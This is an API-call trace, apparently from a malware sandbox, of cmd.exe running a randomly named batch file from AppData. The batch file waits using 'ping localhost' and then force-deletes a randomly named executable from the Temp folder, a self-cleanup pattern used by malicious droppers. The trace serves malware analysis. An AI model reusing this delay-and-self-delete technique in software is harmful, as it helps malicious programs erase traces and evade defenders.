[0175.449] FindClose (in: hFindFile=0x170838 | out: hFindFile=0x170838) returned 1 [0175.449] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0175.449] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0175.449] GetConsoleTitleW (in: lpConsoleTitle=0x14ebac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.449] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0175.449] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0175.449] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0175.449] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x14e448, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e448) returned 0xffffffff [0175.449] GetLastError () returned 0x2 [0175.449] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x14e448, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e448) returned 0xffffffff [0175.450] GetLastError () returned 0x2 [0175.450] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x14e448, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e448) returned 0x170d80 [0175.450] FindClose (in: hFindFile=0x170d80 | out: hFindFile=0x170d80) returned 1 [0175.450] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x14e448, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e448) returned 0xffffffff [0175.450] GetLastError () returned 0x2 [0175.450] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x14e448, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e448) returned 0x170d80 [0175.450] FindClose (in: hFindFile=0x170d80 | out: hFindFile=0x170d80) returned 1 [0175.450] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0175.450] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0175.450] GetConsoleTitleW (in: lpConsoleTitle=0x14e940, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.450] InitializeProcThreadAttributeList (in: lpAttributeList=0x14e7c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14e890 | out: lpAttributeList=0x14e7c8, lpSize=0x14e890) returned 1 [0175.450] UpdateProcThreadAttribute (in: lpAttributeList=0x14e7c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x14e888, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14e7c8, lpPreviousValue=0x0) returned 1 [0175.450] GetStartupInfoW (in: lpStartupInfo=0x14e784 | out: lpStartupInfo=0x14e784*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0175.451] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0175.452] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x14e824*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14e870 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x14e870*(hProcess=0x54, hThread=0x58, dwProcessId=0xa70, dwThreadId=0xaac)) returned 1 [0175.454] CloseHandle (hObject=0x58) returned 1 [0175.454] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0175.454] GetEnvironmentStringsW () returned 0x160970* [0175.454] FreeEnvironmentStringsW (penv=0x160970) returned 1 [0175.454] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0178.403] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x14e764 | out: lpExitCode=0x14e764*=0x0) returned 1 [0178.403] CloseHandle (hObject=0x54) returned 1 [0178.403] _vsnwprintf (in: _Buffer=0x14e8ac, _BufferCount=0x13, _Format="%08X", _ArgList=0x14e770 | out: _Buffer="00000000") returned 8 [0178.403] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0178.403] GetEnvironmentStringsW () returned 0x162c28* [0178.403] FreeEnvironmentStringsW (penv=0x162c28) returned 1 [0178.403] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0178.403] GetEnvironmentStringsW () returned 0x162c28* [0178.403] FreeEnvironmentStringsW (penv=0x162c28) returned 1 [0178.403] DeleteProcThreadAttributeList (in: lpAttributeList=0x14e7c8 | out: lpAttributeList=0x14e7c8) [0178.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.404] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.404] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0178.404] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.404] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.404] SetConsoleInputExeNameW () returned 0x1 [0178.404] GetConsoleOutputCP () returned 0x1b5 [0178.404] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.404] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.404] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\cbffjy09.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14efe4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0178.404] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0178.404] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.404] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0178.405] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.405] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0178.405] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14efc8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x14efc8*=0x7c, lpOverlapped=0x0) returned 1 [0178.405] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0178.405] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\n") returned 62 [0178.405] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.405] GetFileType (hFile=0x54) returned 0x1 [0178.405] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.405] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0178.406] _tell (_FileHandle=3) returned 83 [0178.406] _close (_FileHandle=3) returned 0 [0178.407] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ed9c | out: _Buffer="\r\n") returned 2 [0178.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.407] GetFileType (hFile=0x7) returned 0x2 [0178.407] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.407] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ed5c | out: lpMode=0x14ed5c) returned 1 [0178.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.407] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ed88, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14ed88*=0x2) returned 1 [0178.407] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0178.407] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0178.407] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed98 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0178.407] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x14ed98 | out: _Buffer=">") returned 1 [0178.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.407] GetFileType (hFile=0x7) returned 0x2 [0178.407] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.407] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ed60 | out: lpMode=0x14ed60) returned 1 [0178.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.408] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x14ed8c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x14ed8c*=0x19) returned 1 [0178.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.408] GetFileType (hFile=0x7) returned 0x2 [0178.408] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.408] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14efe4 | out: lpMode=0x14efe4) returned 1 [0178.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.408] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x16f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14f010, lpReserved=0x0 | out: lpBuffer=0x16f008*, lpNumberOfCharsWritten=0x14f010*=0x3) returned 1 [0178.408] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14f01c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" ") returned 58 [0178.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.408] GetFileType (hFile=0x7) returned 0x2 [0178.409] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.409] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14efdc | out: lpMode=0x14efdc) returned 1 [0178.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.409] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x14f008, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14f008*=0x3a) returned 1 [0178.409] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f03c | out: _Buffer="\r\n") returned 2 [0178.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.409] GetFileType (hFile=0x7) returned 0x2 [0178.409] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.409] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14effc | out: lpMode=0x14effc) returned 1 [0178.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.409] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f028, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14f028*=0x2) returned 1 [0178.410] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0178.410] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0178.410] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0178.410] GetConsoleTitleW (in: lpConsoleTitle=0x14ebac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.410] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14dc24, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14dc28, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14dc24*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0178.410] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0178.410] _wcsicmp (_String1="WsPgAGWN.exe", _String2=".") returned 73 [0178.410] _wcsicmp (_String1="WsPgAGWN.exe", _String2="..") returned 73 [0178.410] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x2020 [0178.411] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0178.411] _wcsicmp (_String1="WsPgAGWN.exe", _String2=".") returned 73 [0178.411] _wcsicmp (_String1="WsPgAGWN.exe", _String2="..") returned 73 [0178.411] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x2020 [0178.411] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe", fInfoLevelId=0x0, lpFindFileData=0x170554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x170554) returned 0x150aa8 [0178.411] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 1 [0178.412] FindNextFileW (in: hFindFile=0x150aa8, lpFindFileData=0x170554 | out: lpFindFileData=0x170554) returned 0 [0178.412] GetLastError () returned 0x12 [0178.412] FindClose (in: hFindFile=0x150aa8 | out: hFindFile=0x150aa8) returned 1 [0178.413] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.413] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.413] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.413] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0178.413] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.413] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.413] SetConsoleInputExeNameW () returned 0x1 [0178.413] GetConsoleOutputCP () returned 0x1b5 [0178.413] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.413] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.413] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\cbffjy09.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14efe4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0178.413] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0178.414] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.414] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0178.414] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.414] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0178.414] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14efc8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x14efc8*=0x3e, lpOverlapped=0x0) returned 1 [0178.414] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\n") returned 62 [0178.414] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.414] GetFileType (hFile=0x54) returned 0x1 [0178.414] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.414] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0178.415] _tell (_FileHandle=3) returned 145 [0178.415] _close (_FileHandle=3) returned 0 [0178.415] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ed9c | out: _Buffer="\r\n") returned 2 [0178.415] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.415] GetFileType (hFile=0x7) returned 0x2 [0178.415] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.415] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ed5c | out: lpMode=0x14ed5c) returned 1 [0178.415] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.415] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ed88, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14ed88*=0x2) returned 1 [0178.416] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0178.416] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed98 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0178.416] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x14ed98 | out: _Buffer=">") returned 1 [0178.416] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.416] GetFileType (hFile=0x7) returned 0x2 [0178.416] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.416] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ed60 | out: lpMode=0x14ed60) returned 1 [0178.416] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.416] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x14ed8c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x14ed8c*=0x19) returned 1 [0178.416] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.416] GetFileType (hFile=0x7) returned 0x2 [0178.416] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.416] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14efe4 | out: lpMode=0x14efe4) returned 1 [0178.417] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.417] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x16f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14f010, lpReserved=0x0 | out: lpBuffer=0x16f008*, lpNumberOfCharsWritten=0x14f010*=0x3) returned 1 [0178.417] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14f01c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" ") returned 58 [0178.417] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.417] GetFileType (hFile=0x7) returned 0x2 [0178.417] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.417] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14efdc | out: lpMode=0x14efdc) returned 1 [0178.417] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.417] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x14f008, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14f008*=0x3a) returned 1 [0178.417] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f03c | out: _Buffer="\r\n") returned 2 [0178.417] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.417] GetFileType (hFile=0x7) returned 0x2 [0178.417] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.417] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14effc | out: lpMode=0x14effc) returned 1 [0178.417] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.417] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f028, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14f028*=0x2) returned 1 [0178.418] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0178.418] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0178.418] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0178.418] GetConsoleTitleW (in: lpConsoleTitle=0x14ebac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.418] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14dc24, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14dc28, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14dc24*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0178.418] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0178.418] _wcsicmp (_String1="WsPgAGWN.exe", _String2=".") returned 73 [0178.418] _wcsicmp (_String1="WsPgAGWN.exe", _String2="..") returned 73 [0178.418] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0xffffffff [0178.418] GetLastError () returned 0x2 [0178.418] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0178.418] _wcsicmp (_String1="WsPgAGWN.exe", _String2=".") returned 73 [0178.419] _wcsicmp (_String1="WsPgAGWN.exe", _String2="..") returned 73 [0178.419] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0xffffffff [0178.419] GetLastError () returned 0x2 [0178.419] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe", fInfoLevelId=0x0, lpFindFileData=0x170554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x170554) returned 0xffffffff [0178.419] GetLastError () returned 0x2 [0178.419] _get_osfhandle (_FileHandle=2) returned 0xb [0178.419] GetFileType (hFile=0xb) returned 0x2 [0178.419] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0178.419] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14e624 | out: lpMode=0x14e624) returned 1 [0178.419] _get_osfhandle (_FileHandle=2) returned 0xb [0178.419] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14e658 | out: lpConsoleScreenBufferInfo=0x14e658) returned 1 [0178.420] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0178.420] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.420] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.420] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.420] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0178.420] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.420] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.421] SetConsoleInputExeNameW () returned 0x1 [0178.421] GetConsoleOutputCP () returned 0x1b5 [0178.421] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.421] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.421] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\cbffjy09.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14efe4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0178.421] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0178.421] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.421] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0178.421] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.421] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0178.422] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14efc8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x14efc8*=0x0, lpOverlapped=0x0) returned 1 [0178.422] GetLastError () returned 0x0 [0178.422] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.422] GetFileType (hFile=0x54) returned 0x1 [0178.422] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.422] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0178.422] 